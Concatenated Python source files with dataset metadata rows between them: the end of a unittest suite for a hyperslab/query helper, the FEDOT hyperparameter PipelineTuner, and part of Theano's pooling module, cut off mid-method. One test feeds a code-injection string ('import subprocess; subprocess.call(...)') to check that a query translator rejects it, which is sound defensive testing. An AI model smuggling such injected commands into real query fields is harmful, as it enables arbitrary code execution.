        slices = getHyperslabSelection(datashape, 20, 80)
        self.assertEqual(len(slices), 1)
        self.assertEqual(slices[0], slice(20, 80, 1))
        slices = getHyperslabSelection(datashape, 20, 80, 2)
        self.assertEqual(len(slices), 1)
        self.assertEqual(slices[0], slice(20, 80, 2))
        # 2-D case: per-dimension start/stop/step tuples
        datashape = [100, 50]
        slices = getHyperslabSelection(datashape)
        self.assertEqual(len(slices), 2)
        self.assertEqual(slices[0], slice(0, 100, 1))
        self.assertEqual(slices[1], slice(0, 50, 1))
        slices = getHyperslabSelection(datashape, (10, 20))
        self.assertEqual(len(slices), 2)
        self.assertEqual(slices[0], slice(10, 100, 1))
        self.assertEqual(slices[1], slice(20, 50, 1))
        slices = getHyperslabSelection(datashape, (10, 20), (90, 30))
        self.assertEqual(len(slices), 2)
        self.assertEqual(slices[0], slice(10, 90, 1))
        self.assertEqual(slices[1], slice(20, 30, 1))
        slices = getHyperslabSelection(datashape, (10, 20), (90, 30), (1,2))
        self.assertEqual(len(slices), 2)
        self.assertEqual(slices[0], slice(10, 90, 1))
        self.assertEqual(slices[1], slice(20, 30, 2))

    def testGetSelectionShape(self):
        """Check element counts, including stepped and 2-d selections."""
        sel = [ slice(3,7,1), ]
        shape = getSelectionShape(sel)
        self.assertEqual(shape, [4,])
        sel = [ slice(3,7,3), ]  # select points 3, 6
        shape = getSelectionShape(sel)
        self.assertEqual(shape, [2,])
        sel = [ slice(44,52,1), slice(48,52,1) ]
        shape = getSelectionShape(sel)
        self.assertEqual(shape, [8,4])
        sel = [ slice(0, 4, 2), ]  # select points 0, 2
        shape = getSelectionShape(sel)
        self.assertEqual(shape, [2,])
        sel = [ slice(0, 5, 2), ]  # select points 0, 2, 4
        shape = getSelectionShape(sel)
        self.assertEqual(shape, [3,])

    def testGetEvalStr(self):
        """Each query string must translate to the expected eval expression."""
        queries = { "date == 23": "rows['date'] == 23",
                    "wind == b'W 5'": "rows['wind'] == b'W 5'",
                    "temp > 61": "rows['temp'] > 61",
                    "(date >=22) & (date <= 24)": "(rows['date'] >=22) & (rows['date'] <= 24)",
                    "(date == 21) & (temp > 70)": "(rows['date'] == 21) & (rows['temp'] > 70)",
                    "(wind == b'E 7') | (wind == b'S 7')": "(rows['wind'] == b'E 7') | (rows['wind'] == b'S 7')" }
        fields = ["date", "wind", "temp"]
        for query in queries.keys():
            eval_str = getEvalStr(query, "rows", fields)
            self.assertEqual(eval_str, queries[query])
            #print(query, "->", eval_str)

    def testBadQuery(self):
        """Malformed or malicious queries must raise from getEvalStr."""
        queries = ( "foobar",  # no variable used
                    "wind = b'abc",  # non-closed literal
                    "(wind = b'N') & (temp = 32",  # missing paren
                    "foobar > 42",  # invalid field name
                    "import subprocess; subprocess.call(['ls', '/'])")  # injection attack
        fields = ("date", "wind", "temp" )
        for query in queries:
            try:
                eval_str = getEvalStr(query, "x", fields)
                self.assertTrue(False)  # shouldn't get here
            except Exception:
                pass  # ok

    def testItemIterator(self):
        """Iterate a selection point-by-point via ItemIterator.next()."""
        # 1-D case
        datashape = [10,]
        slices = getHyperslabSelection(datashape)
        it = ItemIterator(slices)
        indices = []
        count = 0
        while True:
            try:
                index = it.next()
                count += 1
                indices.append(index)
            except StopIteration:
                break
        self.assertEqual(count, 10)
        self.assertEqual(indices, list(range(10)))
        # 2-D case
        datashape = [4, 5]
        slices = getHyperslabSelection(datashape)
        it = ItemIterator(slices)
        indices = []
        count = 0
        while True:
            try:
                index = it.next()
                # NOTE(review): assertTrue(len(index), 2) treats 2 as the msg
                # argument and always passes; assertEqual was likely intended.
                self.assertTrue(len(index), 2)
                self.assertTrue(index[0] >= 0)
                self.assertTrue(index[0] < 4)
                self.assertTrue(index[1] >= 0)
                self.assertTrue(index[1] < 5)
                count += 1
                indices.append(index)
            except StopIteration:
                break
        self.assertEqual(count, 20)
if __name__ == '__main__':
    # Run the test suite when executed directly.
    unittest.main()
| 38.27439 | 114 | 0.498487 | true | true | |
f71048378dda0fc6890665ea8932c66d76ee0535 | 6,037 | py | Python | fedot/core/pipelines/tuning/unified.py | bahia14/Fedot_Times_Series_Forecast | 995751068733541ba2f546065082709ce0fb63ae | [
"BSD-3-Clause"
] | null | null | null | fedot/core/pipelines/tuning/unified.py | bahia14/Fedot_Times_Series_Forecast | 995751068733541ba2f546065082709ce0fb63ae | [
"BSD-3-Clause"
] | null | null | null | fedot/core/pipelines/tuning/unified.py | bahia14/Fedot_Times_Series_Forecast | 995751068733541ba2f546065082709ce0fb63ae | [
"BSD-3-Clause"
] | null | null | null | from datetime import timedelta
from functools import partial
import numpy as np
from hyperopt import fmin, space_eval, tpe
from fedot.core.data.data_split import train_test_data_setup
from fedot.core.log import Log
from fedot.core.pipelines.tuning.hyperparams import convert_params, get_node_params
from fedot.core.pipelines.tuning.tuner_interface import HyperoptTuner, _greater_is_better
MAX_METRIC_VALUE = 10e6
class PipelineTuner(HyperoptTuner):
"""
Class for hyperparameters optimization for all nodes simultaneously
"""
def __init__(self, pipeline, task, iterations=100,
timeout: timedelta = timedelta(minutes=5),
log: Log = None):
super().__init__(pipeline, task, iterations, timeout, log)
def tune_pipeline(self, input_data, loss_function, loss_params=None):
""" Function for hyperparameters tuning on the entire pipeline """
parameters_dict = self._get_parameters_for_tune(self.pipeline)
# Train test split
train_input, predict_input = train_test_data_setup(input_data)
test_target = np.array(predict_input.target)
is_need_to_maximize = _greater_is_better(target=test_target,
loss_function=loss_function,
loss_params=loss_params)
self.is_need_to_maximize = is_need_to_maximize
# Check source metrics for data
self.init_check(train_input, predict_input, test_target,
loss_function, loss_params)
best = fmin(partial(self._objective,
pipeline=self.pipeline,
train_input=train_input,
predict_input=predict_input,
test_target=test_target,
loss_function=loss_function,
loss_params=loss_params),
parameters_dict,
algo=tpe.suggest,
max_evals=self.iterations,
timeout=self.max_seconds)
best = space_eval(space=parameters_dict, hp_assignment=best)
tuned_pipeline = self.set_arg_pipeline(pipeline=self.pipeline,
parameters=best)
# Validation is the optimization do well
final_pipeline = self.final_check(train_input=train_input,
predict_input=predict_input,
test_target=test_target,
tuned_pipeline=tuned_pipeline,
loss_function=loss_function,
loss_params=loss_params)
return final_pipeline
@staticmethod
def set_arg_pipeline(pipeline, parameters):
""" Method for parameters setting to a pipeline
:param pipeline: pipeline to which parameters should ba assigned
:param parameters: dictionary with parameters to set
:return pipeline: pipeline with new hyperparameters in each node
"""
# Set hyperparameters for every node
for node_id, _ in enumerate(pipeline.nodes):
node_params = parameters.get(node_id)
if node_params is not None:
# Delete all prefix strings to get appropriate parameters names
new_params = convert_params(node_params)
# Update parameters in nodes
pipeline.nodes[node_id].custom_params = new_params
return pipeline
@staticmethod
def _get_parameters_for_tune(pipeline):
"""
Function for defining the search space
:param pipeline: pipeline to optimize
:return parameters_dict: dictionary with operation names and parameters
"""
parameters_dict = {}
for node_id, node in enumerate(pipeline.nodes):
operation_name = str(node.operation)
# Assign unique prefix for each model hyperparameter
# label - number of node in the pipeline
node_params = get_node_params(node_id=node_id,
operation_name=operation_name)
parameters_dict.update({node_id: node_params})
return parameters_dict
    def _objective(self, parameters_dict, pipeline, train_input, predict_input,
                   test_target, loss_function, loss_params: dict):
        """
        Objective function for minimization / maximization problem
        :param parameters_dict: dictionary with operation names and parameters
        :param pipeline: pipeline to optimize
        :param train_input: input for train pipeline model
        :param predict_input: input for test pipeline model
        :param test_target: target for validation
        :param loss_function: loss function to optimize
        :param loss_params: parameters for loss function
        :return metric_value: value of objective function
        """
        # Set hyperparameters for every node
        pipeline = PipelineTuner.set_arg_pipeline(pipeline=pipeline, parameters=parameters_dict)
        try:
            metric_value = PipelineTuner.get_metric_value(train_input=train_input,
                                                          predict_input=predict_input,
                                                          test_target=test_target,
                                                          pipeline=pipeline,
                                                          loss_function=loss_function,
                                                          loss_params=loss_params)
        except Exception:
            # Any failure during fit/predict is scored as the worst possible
            # value so hyperopt steers away from this parameter region.
            # NOTE(review): the broad `except Exception` is deliberate here,
            # but it also hides programming errors - consider logging first.
            if self.is_need_to_maximize is True:
                metric_value = -MAX_METRIC_VALUE
            else:
                metric_value = MAX_METRIC_VALUE
        # hyperopt always minimizes, so negate the metric when the original
        # problem is a maximization one
        if self.is_need_to_maximize is True:
            return -metric_value
        else:
            return metric_value
| 40.246667 | 96 | 0.597813 | from datetime import timedelta
from functools import partial
import numpy as np
from hyperopt import fmin, space_eval, tpe
from fedot.core.data.data_split import train_test_data_setup
from fedot.core.log import Log
from fedot.core.pipelines.tuning.hyperparams import convert_params, get_node_params
from fedot.core.pipelines.tuning.tuner_interface import HyperoptTuner, _greater_is_better
MAX_METRIC_VALUE = 10e6
class PipelineTuner(HyperoptTuner):
def __init__(self, pipeline, task, iterations=100,
timeout: timedelta = timedelta(minutes=5),
log: Log = None):
super().__init__(pipeline, task, iterations, timeout, log)
def tune_pipeline(self, input_data, loss_function, loss_params=None):
parameters_dict = self._get_parameters_for_tune(self.pipeline)
train_input, predict_input = train_test_data_setup(input_data)
test_target = np.array(predict_input.target)
is_need_to_maximize = _greater_is_better(target=test_target,
loss_function=loss_function,
loss_params=loss_params)
self.is_need_to_maximize = is_need_to_maximize
self.init_check(train_input, predict_input, test_target,
loss_function, loss_params)
best = fmin(partial(self._objective,
pipeline=self.pipeline,
train_input=train_input,
predict_input=predict_input,
test_target=test_target,
loss_function=loss_function,
loss_params=loss_params),
parameters_dict,
algo=tpe.suggest,
max_evals=self.iterations,
timeout=self.max_seconds)
best = space_eval(space=parameters_dict, hp_assignment=best)
tuned_pipeline = self.set_arg_pipeline(pipeline=self.pipeline,
parameters=best)
final_pipeline = self.final_check(train_input=train_input,
predict_input=predict_input,
test_target=test_target,
tuned_pipeline=tuned_pipeline,
loss_function=loss_function,
loss_params=loss_params)
return final_pipeline
@staticmethod
def set_arg_pipeline(pipeline, parameters):
for node_id, _ in enumerate(pipeline.nodes):
node_params = parameters.get(node_id)
if node_params is not None:
new_params = convert_params(node_params)
pipeline.nodes[node_id].custom_params = new_params
return pipeline
@staticmethod
def _get_parameters_for_tune(pipeline):
parameters_dict = {}
for node_id, node in enumerate(pipeline.nodes):
operation_name = str(node.operation)
node_params = get_node_params(node_id=node_id,
operation_name=operation_name)
parameters_dict.update({node_id: node_params})
return parameters_dict
def _objective(self, parameters_dict, pipeline, train_input, predict_input,
test_target, loss_function, loss_params: dict):
pipeline = PipelineTuner.set_arg_pipeline(pipeline=pipeline, parameters=parameters_dict)
try:
metric_value = PipelineTuner.get_metric_value(train_input=train_input,
predict_input=predict_input,
test_target=test_target,
pipeline=pipeline,
loss_function=loss_function,
loss_params=loss_params)
except Exception:
if self.is_need_to_maximize is True:
metric_value = -MAX_METRIC_VALUE
else:
metric_value = MAX_METRIC_VALUE
if self.is_need_to_maximize is True:
return -metric_value
else:
return metric_value
| true | true |
f71048c31984514aba32b993f0eaae5c4531e8fa | 97,683 | py | Python | theano/tensor/signal/pool.py | zploskey/Theano | 9b3f6351d41d9f5e01b198e3de7538d7f032c409 | [
"BSD-3-Clause"
] | 1 | 2017-06-30T21:37:52.000Z | 2017-06-30T21:37:52.000Z | theano/tensor/signal/pool.py | zploskey/Theano | 9b3f6351d41d9f5e01b198e3de7538d7f032c409 | [
"BSD-3-Clause"
] | null | null | null | theano/tensor/signal/pool.py | zploskey/Theano | 9b3f6351d41d9f5e01b198e3de7538d7f032c409 | [
"BSD-3-Clause"
] | 1 | 2020-01-06T20:28:42.000Z | 2020-01-06T20:28:42.000Z |
"""
Ops for downsampling images.
Planned:
Pool, DownsampleAvg, DownsampleSoftmax.
"""
from __future__ import absolute_import, print_function, division
# This file should move along with conv.py
import warnings
import itertools
import numpy as np
from six.moves import xrange
import six.moves.builtins as builtins
import theano
from theano import gof, OpenMPOp, tensor, Variable, Apply
from theano.gof import ParamsType, EnumList
from theano.gradient import DisconnectedType
from theano.scalar import bool as bool_t
def max_pool_2d_same_size(input, patch_size):
    """
    Takes as input a 4-D tensor. It sets all non maximum values
    of non-overlapping patches of size (patch_size[0],patch_size[1]) to zero,
    keeping only the maximum values. The output has the same dimensions as
    the input.
    Parameters
    ----------
    input : 4-D theano tensor of input images
        Input images. Max pooling will be done over the 2 last dimensions.
    patch_size : tuple of length 2 or theano vector of ints of size 2.
        Size of the patch (patch height, patch width).
        (2,2) will retain only one non-zero value per patch of 4 values.
    """
    # Pool first, then feed the pooled result in as its own "gradient":
    # MaxPoolGrad routes each incoming value back to the argmax position,
    # so non-maximum entries end up zero at the original resolution.
    output = Pool(True)(input, patch_size)
    outs = MaxPoolGrad(True)(input, output, output, patch_size)
    return outs
def pool_2d(input, ws=None, ignore_border=None, stride=None, pad=(0, 0),
            mode='max', ds=None, st=None, padding=None):
    """Downscale the input by a specified factor
    Takes as input a N-D tensor, where N >= 2. It downscales the input image by
    the specified factor, by keeping only the maximum value of non-overlapping
    patches of size (ws[0],ws[1])
    Parameters
    ----------
    input : N-D theano tensor of input images
        Input images. Max pooling will be done over the 2 last dimensions.
    ws : tuple of length 2 or theano vector of ints of size 2.
        Factor by which to downscale (vertical ws, horizontal ws).
        (2,2) will halve the image in each dimension.
    ignore_border : bool (default None, will print a warning and set to False)
        When True, (5,5) input with ws=(2,2) will generate a (2,2) output.
        (3,3) otherwise.
    stride : tuple of two ints or theano vector of ints of size 2.
        Stride size, which is the number of shifts over rows/cols to get the
        next pool region. If stride is None, it is considered equal to ws
        (no overlap on pooling regions), eg: stride=(1,1) will shifts over
        one row and one col for every iteration.
    pad : tuple of two ints or theano vector of ints of size 2.
        (pad_h, pad_w), pad zeros to extend beyond four borders of the
        images, pad_h is the size of the top and bottom margins, and
        pad_w is the size of the left and right margins.
    mode : {'max', 'sum', 'average_inc_pad', 'average_exc_pad'}
        Operation executed on each window. `max` and `sum` always exclude
        the padding in the computation. `average` gives you the choice to
        include or exclude it.
    ds
        *deprecated*, use parameter ws instead.
    st
        *deprecated*, use parameter stride instead.
    padding
        *deprecated*, use parameter pad instead.
    """
    # check for deprecated parameter names
    if ds is not None:
        if ws is not None:
            raise ValueError(
                "You can't provide a tuple value to both 'ws' and 'ds'."
                " Please provide a value only to 'ws'."
            )
        else:
            warnings.warn(
                "DEPRECATION: the 'ds' parameter is not going to exist"
                " anymore as it is going to be replaced by the parameter"
                " 'ws'.",
                stacklevel=2
            )
            ws = ds
    elif ds is None and ws is None:
        raise ValueError(
            "You must provide a tuple value for the window size."
        )
    if st is not None:
        if stride is not None:
            raise ValueError(
                "You can't provide a tuple value to both 'st and 'stride'."
                " Please provide a value only to 'stride'."
            )
        else:
            warnings.warn(
                "DEPRECATION: the 'st' parameter is not going to exist"
                " anymore as it is going to be replaced by the parameter"
                " 'stride'.",
                stacklevel=2
            )
            stride = st
    if padding is not None:
        # 'padding' may only be used while 'pad' still has its default value
        if pad not in {None, (0, 0)}:
            raise ValueError(
                "You can't provide a tuple value to both 'padding' and pad."
                " Please provide a value only to pad."
            )
        else:
            warnings.warn(
                "DEPRECATION: the 'padding' parameter is not going to exist"
                " anymore as it is going to be replaced by the parameter"
                " 'pad'.",
                stacklevel=2
            )
            pad = padding
    if input.ndim < 2:
        raise NotImplementedError('pool_2d requires a dimension >= 2')
    if ignore_border is None:
        warnings.warn(
            "pool_2d() will have the parameter ignore_border"
            " default value changed to True (currently"
            " False). To have consistent behavior with all Theano"
            " version, explicitly add the parameter ignore_border=True."
            " On the GPU, using ignore_border=True is needed to use cuDNN."
            " When using ignore_border=False and not using cuDNN, the only"
            " GPU combination supported is when"
            " `ws == stride and pad == (0, 0) and mode == 'max'`."
            " Otherwise, the convolution will be executed on CPU.",
            stacklevel=2)
        ignore_border = False
    op = Pool(ignore_border, ndim=2, mode=mode)
    output = op(input, ws, stride, pad)
    return output
def pool_3d(input, ws=None, ignore_border=None, stride=None, pad=(0, 0, 0),
            mode='max', ds=None, st=None, padding=None):
    """Downscale the input by a specified factor
    Takes as input a N-D tensor, where N >= 3. It downscales the input image by
    the specified factor, by keeping only the maximum value of non-overlapping
    patches of size (ws[0],ws[1],ws[2])
    Parameters
    ----------
    input : N-D theano tensor of input images
        Input images. Max pooling will be done over the 3 last dimensions.
    ws : tuple of length 3 or theano vector of ints of size 3
        Factor by which to downscale (vertical ws, horizontal ws, depth ws).
        (2,2,2) will halve the image in each dimension.
    ignore_border : bool (default None, will print a warning and set to False)
        When True, (5,5,5) input with ws=(2,2,2) will generate a (2,2,2) output.
        (3,3,3) otherwise.
    stride : tuple of three ints or theano vector of ints of size 3
        Stride size, which is the number of shifts over rows/cols/slices to get
        the next pool region. If stride is None, it is considered equal to ws
        (no overlap on pooling regions).
    pad : tuple of three ints or theano vector of ints of size 3
        (pad_h, pad_w, pad_d), pad zeros to extend beyond six borders of the
        images, pad_h is the size of the top and bottom margins,
        pad_w is the size of the left and right margins, and pad_d is the size
        of the front and back margins
    mode : {'max', 'sum', 'average_inc_pad', 'average_exc_pad'}
        Operation executed on each window. `max` and `sum` always exclude
        the padding in the computation. `average` gives you the choice to
        include or exclude it.
    ds
        *deprecated*, use parameter ws instead.
    st
        *deprecated*, use parameter stride instead.
    padding
        *deprecated*, use parameter pad instead.
    """
    # check for deprecated parameter names
    if ds is not None:
        if ws is not None:
            raise ValueError(
                "You can't provide a tuple value to both 'ws' and 'ds'."
                " Please provide a value only to 'ws'."
            )
        else:
            warnings.warn(
                "DEPRECATION: the 'ds' parameter is not going to exist"
                " anymore as it is going to be replaced by the parameter"
                " 'ws'.",
                stacklevel=2
            )
            ws = ds
    elif ds is None and ws is None:
        raise ValueError(
            "You must provide a tuple value for the window size."
        )
    if st is not None:
        if stride is not None:
            raise ValueError(
                "You can't provide a tuple value to both 'st and 'stride'."
                " Please provide a value only to 'stride'."
            )
        else:
            warnings.warn(
                "DEPRECATION: the 'st' parameter is not going to exist"
                " anymore as it is going to be replaced by the parameter"
                " 'stride'.",
                stacklevel=2
            )
            stride = st
    if padding is not None:
        # 'padding' may only be used while 'pad' still has its default value
        if pad not in {None, (0, 0, 0)}:
            raise ValueError(
                "You can't provide a tuple value to both 'padding' and pad."
                " Please provide a value only to pad."
            )
        else:
            warnings.warn(
                "DEPRECATION: the 'padding' parameter is not going to exist"
                " anymore as it is going to be replaced by the parameter"
                " 'pad'.",
                stacklevel=2
            )
            pad = padding
    if input.ndim < 3:
        raise NotImplementedError('pool_3d requires a dimension >= 3')
    if ignore_border is None:
        warnings.warn(
            "pool_3d() will have the parameter ignore_border"
            " default value changed to True (currently"
            " False). To have consistent behavior with all Theano"
            " version, explicitly add the parameter ignore_border=True."
            " On the GPU, using ignore_border=True is needed to use cuDNN."
            " When using ignore_border=False and not using cuDNN, the only"
            " GPU combination supported is when"
            " `ws == stride and pad == (0, 0, 0) and mode == 'max'`."
            " Otherwise, the convolution will be executed on CPU.",
            stacklevel=2)
        ignore_border = False
    op = Pool(ignore_border, ndim=3, mode=mode)
    output = op(input, ws, stride, pad)
    return output
# NB: This enum type is currently used in gpuarray/pool.py.
# It may be used later as op param in this current file.
# Enum name and constants names are inspired from cuDNN type `cudnnPoolingMode_t`
# (cf. `theano/gpuarray/cudnn_defs.py`).
# Each pair maps a C-level enum constant name to the Python-side mode string.
PoolingMode_t = EnumList(('POOLING_MAX', 'max'),
                         ('POOLING_SUM', 'sum'),
                         ('POOLING_AVERAGE_COUNT_INCLUDE_PADDING', 'average_inc_pad'),
                         ('POOLING_AVERAGE_COUNT_EXCLUDE_PADDING', 'average_exc_pad'))
class Pool(OpenMPOp):
"""
sum or average over different patches.
Parameters
----------
ws : list or tuple of N ints
Downsample factor over rows, columns etc.
ws indicates the size of the pooling region.
ignore_border : bool
If ws doesn't divide imgshape, do we include an extra row/col/slice
of partial downsampling (False) or ignore it (True).
stride : list or tuple of N ints or None
Stride size, which is the number of shifts over rows/cols/slices to get the
next pool region. If stride is None, it is considered equal to ws
(no overlap on pooling regions).
pad : tuple of N ints or None
For each downsampling dimension, this specifies the number of zeros to
add as padding on both sides. For 2D and (pad_h, pad_w), pad_h specifies the
size of the top and bottom margins, pad_w specifies the size of the left and
right margins. No padding is added if pad is None.
mode : {'max', 'sum', 'average_inc_pad', 'average_exc_pad'}
('average_inc_pad' excludes the padding from the count,
'average_exc_pad' include it)
ndim : int
The number of pooling dimensions N.
The default is 2.
ds
*deprecated*, use parameter ws instead.
st
*deprecated*, use parameter st instead.
padding
*deprecated*, use parameter pad instead.
"""
__props__ = ('ignore_border', 'mode', 'ndim')
params_type = ParamsType(ignore_border=bool_t,)
    @staticmethod
    def out_shape(imgshape, ws=None, ignore_border=False, stride=None, pad=None,
                  ndim=2, ds=None, st=None, padding=None):
        """
        Return the shape of the output from this op, for input of given
        shape and flags.
        Parameters
        ----------
        imgshape : tuple, list, or similar of integer or scalar Theano variable
            The shape of a tensor of images. The last N elements are
            interpreted as the number of rows, and the number of cols.
        ws : list or tuple of N ints
            Downsample factor over rows and column.
            ws indicates the pool region size.
        ignore_border : bool
            If ws doesn't divide imgshape, do we include an extra row/col/slice
            of partial downsampling (False) or ignore it (True).
        stride : list or tuple of N ints or None
            Stride size, which is the number of shifts over rows/cols/slices to get the
            next pool region. If stride is None, it is considered equal to ws
            (no overlap on pooling regions).
        pad : tuple of N ints or None
            For each downsampling dimension, this specifies the number of zeros to
            add as padding on both sides. For 2D and (pad_h, pad_w), pad_h specifies the
            size of the top and bottom margins, pad_w specifies the size of the left and
            right margins. No padding is added if pad is None.
        ndim : int
            The number of pooling dimensions N.
            The default is 2.
        ds
            *deprecated*, use parameter ws instead.
        st
            *deprecated*, use parameter stride instead.
        padding
            *deprecated*, use parameter pad instead.
        Returns
        -------
        list
            The shape of the output from this op, for input of given shape.
            This will have the same length as imgshape, but with last N
            elements reduced as per the downsampling & ignore_border flags.
        """
        # check for deprecated parameter names
        if ds is not None:
            if ws is not None:
                raise ValueError(
                    "You can't provide a tuple value to both 'ws' and 'ds'."
                    " Please provide a value only to 'ws'."
                )
            else:
                warnings.warn(
                    "DEPRECATION: the 'ds' parameter is not going to exist"
                    " anymore as it is going to be replaced by the parameter"
                    " 'ws'.",
                    stacklevel=2
                )
                ws = ds
        elif ds is None and ws is None:
            raise ValueError(
                "You must provide a tuple value for the window size."
            )
        if st is not None:
            if stride is not None:
                raise ValueError(
                    "You can't provide a tuple value to both 'st and 'stride'."
                    " Please provide a value only to 'stride'."
                )
            else:
                warnings.warn(
                    "DEPRECATION: the 'st' parameter is not going to exist"
                    " anymore as it is going to be replaced by the parameter"
                    " 'stride'.",
                    stacklevel=2
                )
                stride = st
        if padding is not None:
            zero_pad = (0,) * ndim
            if pad not in {None, zero_pad}:
                raise ValueError(
                    "You can't provide a tuple value to both 'padding' and pad."
                    " Please provide a value only to pad."
                )
            else:
                warnings.warn(
                    "DEPRECATION: the 'padding' parameter is not going to"
                    " exist anymore as it is going to be replaced by the"
                    " parameter 'pad'.",
                    stacklevel=2
                )
                pad = padding
        if ndim is None:
            ndim = 2
        assert ndim > 0
        if len(imgshape) < ndim:
            raise TypeError('imgshape must have at least {} dimensions'.format(ndim))
        if stride is None:
            stride = ws
        if pad is None:
            pad = (0,) * ndim
        # lengths of the pooled dimensions after symmetric zero padding
        patch_shape = tuple(tensor.extract_constant(imgshape[-ndim + i]) + pad[i] * 2
                            for i in xrange(ndim))
        def compute_out(v, downsample, stride):
            # Pooled output length along one dimension for padded input
            # length v; handles both symbolic and concrete lengths.
            if ignore_border:
                if downsample == stride:
                    return v // stride
                else:
                    out = (v - downsample) // stride + 1
                    if isinstance(out, theano.Variable):
                        return tensor.maximum(out, 0)
                    else:
                        return np.maximum(out, 0)
            else:
                if isinstance(v, theano.Variable):
                    return tensor.switch(tensor.ge(stride, downsample),
                                         (v - 1) // stride + 1,
                                         tensor.maximum(0, (v - 1 - downsample) //
                                                        stride + 1) + 1)
                elif stride >= downsample:
                    return (v - 1) // stride + 1
                else:
                    return max(0, (v - 1 - downsample + stride) // stride) + 1
        out_shape = [compute_out(patch_shape[i], ws[i], stride[i]) for i in xrange(ndim)]
        rval = list(imgshape[:-ndim]) + out_shape
        return rval
def __init__(self, ignore_border=False, mode='max', ndim=2, openmp=None):
super(Pool, self).__init__(openmp=openmp)
self.ndim = ndim
self.ignore_border = ignore_border
if mode == 'max_deterministic':
# It seems max pool algo is already deterministic in CPU.
mode = 'max'
if mode not in ['max', 'average_inc_pad', 'average_exc_pad', 'sum']:
raise ValueError(
"Pool mode parameter only support 'max', 'sum',"
" 'average_inc_pad' and 'average_exc_pad'. Got %s" % mode)
self.mode = mode
    def prepare_node(self, node, storage_map, compute_map, impl):
        """Upgrade nodes built with the old single-input interface.

        Old nodes carried ws/st/padding as op attributes; append them as
        constant inputs so the current 4-input perform/c_code can run.
        """
        if len(node.inputs) == 1:
            # Old interface
            self.ndim = len(node.op.ds)
            self.mode = node.op.mode
            ws = theano.tensor.constant(node.op.ds)
            st = theano.tensor.constant(node.op.st)
            pad = theano.tensor.constant(node.op.padding)
            node.inputs.append(ws)
            node.inputs.append(st)
            node.inputs.append(pad)
            # Register the appended inputs in the function maps: constants
            # are already "computed", anything else starts out unset.
            if isinstance(ws, theano.Constant):
                storage_map[ws] = [ws.data]
                compute_map[ws] = [True]
            else:
                storage_map[ws] = [None]
                compute_map[ws] = [False]
            if isinstance(st, theano.Constant):
                storage_map[st] = [st.data]
                compute_map[st] = [True]
            else:
                storage_map[st] = [None]
                compute_map[st] = [False]
            if isinstance(pad, theano.Constant):
                storage_map[pad] = [pad.data]
                compute_map[pad] = [True]
            else:
                storage_map[pad] = [None]
                compute_map[pad] = [False]
    def make_node(self, x, ws, stride=None, pad=None):
        """Build the Apply node.

        ws/stride/pad become 1-D symbolic int vectors; stride defaults to
        ws and pad defaults to all zeros.
        """
        # TODO: consider restricting the dtype?
        x = tensor.as_tensor_variable(x)
        nd = self.ndim
        if stride is None:
            stride = ws
        if pad is None:
            pad = (0,) * nd
        elif isinstance(pad, (tuple, list)):
            # These checks are only possible when pad is given as concrete
            # numbers; symbolic pad skips them.
            if max(pad) != 0 and not self.ignore_border:
                raise NotImplementedError(
                    'padding works only with ignore_border=True')
            if isinstance(ws, (tuple, list)):
                if any(pad[i] >= ws[i] for i in range(nd)):
                    raise NotImplementedError(
                        'padding must be smaller than strides')
        ws = tensor.as_tensor_variable(ws)
        stride = tensor.as_tensor_variable(stride)
        pad = tensor.as_tensor_variable(pad)
        assert ws.ndim == 1
        assert stride.ndim == 1
        assert pad.ndim == 1
        if x.type.ndim < nd:
            raise TypeError()
        if ws.dtype not in tensor.int_dtypes:
            raise TypeError('Pool downsample parameters must be ints.')
        if stride.dtype not in tensor.int_dtypes:
            raise TypeError('Stride parameters must be ints.')
        if pad.dtype not in tensor.int_dtypes:
            raise TypeError('Padding parameters must be ints.')
        # If the input shape are broadcastable we can have 0 in the output shape
        broad = x.broadcastable[:-nd] + (False,) * nd
        out = tensor.TensorType(x.dtype, broad)
        return gof.Apply(self, [x, ws, stride, pad], [out()])
def perform(self, node, inp, out, params):
x, ws, stride, pad = inp
z, = out
nd = self.ndim
assert ws.shape == stride.shape == pad.shape == (nd,)
if len(x.shape) < nd:
raise NotImplementedError(
'Pool requires input with {} or more dimensions'.format(nd))
z_shape = self.out_shape(x.shape, ws, params.ignore_border, stride, pad, nd)
if not params.ignore_border:
assert all(z > 0 for z in z_shape[-nd:])
if (z[0] is None) or (z[0].shape != z_shape):
z[0] = np.empty(z_shape, dtype=x.dtype)
zz = z[0]
# size of pooling output
pool_out_shp = zz.shape[-nd:]
img_shp = tuple(x.shape[-nd + i] + 2 * pad[i] for i in xrange(nd))
inc_pad = self.mode == 'average_inc_pad'
# pad the image
if max(pad) != 0:
y = np.zeros(x.shape[:-nd] + img_shp, dtype=x.dtype)
y[(slice(None),) * (len(x.shape) - nd) +
tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))] = x
else:
y = x
func = np.max
if self.mode == 'sum':
func = np.sum
elif self.mode != 'max':
func = np.average
# precompute the region boundaries for each dimension
region_slices = [[] for i in xrange(nd)]
for i in xrange(nd):
for j in xrange(pool_out_shp[i]):
start = j * stride[i]
end = builtins.min(start + ws[i], img_shp[i])
if not inc_pad:
start = builtins.max(start, pad[i])
end = builtins.min(end, img_shp[i] - pad[i])
region_slices[i].append(slice(start, end))
# iterate over non-pooling dimensions
for k in np.ndindex(*x.shape[:-nd]):
zzk = zz[k]
yk = y[k]
# iterate over pooling regions
for r in np.ndindex(*pool_out_shp):
zzk[r] = func(
yk[[region_slices[i][r[i]] for i in xrange(nd)]])
def infer_shape(self, node, in_shapes):
ws, stride, pad = [node.inputs[1], node.inputs[2], node.inputs[3]]
shp = self.out_shape(in_shapes[0], ws, self.ignore_border, stride,
pad, self.ndim)
return [shp]
    def L_op(self, inputs, outputs, grads):
        """Gradient: MaxPoolGrad for 'max', AveragePoolGrad otherwise.

        ws/stride/pad are integer shape parameters, hence disconnected.
        """
        x, ws, stride, pad = inputs
        gz, = grads
        disc = [DisconnectedType()() for i in inputs[1:]]
        if self.mode == 'max':
            # Max pooling needs the forward output to locate each argmax.
            return [MaxPoolGrad(ndim=self.ndim,
                                ignore_border=self.ignore_border)(
                x, outputs[0], gz, ws=ws, stride=stride, pad=pad)] + disc
        else:
            return [AveragePoolGrad(ndim=self.ndim,
                                    ignore_border=self.ignore_border,
                                    mode=self.mode)(
                x, gz, ws=ws, stride=stride, pad=pad)] + disc
    def connection_pattern(self, node):
        # Only the image input x is connected to the output; ws, stride and
        # pad are integer parameters with no gradient (cf. L_op).
        return [[1], [0], [0], [0]]
    def R_op(self, inputs, eval_points):
        """R-operator (forward-mode derivative) of the pooling op."""
        if self.mode != 'max':
            # Rop for average or sum is simply pooling evaluated at eval point
            eval_inputs = [eval_points[0]] + inputs[1:]
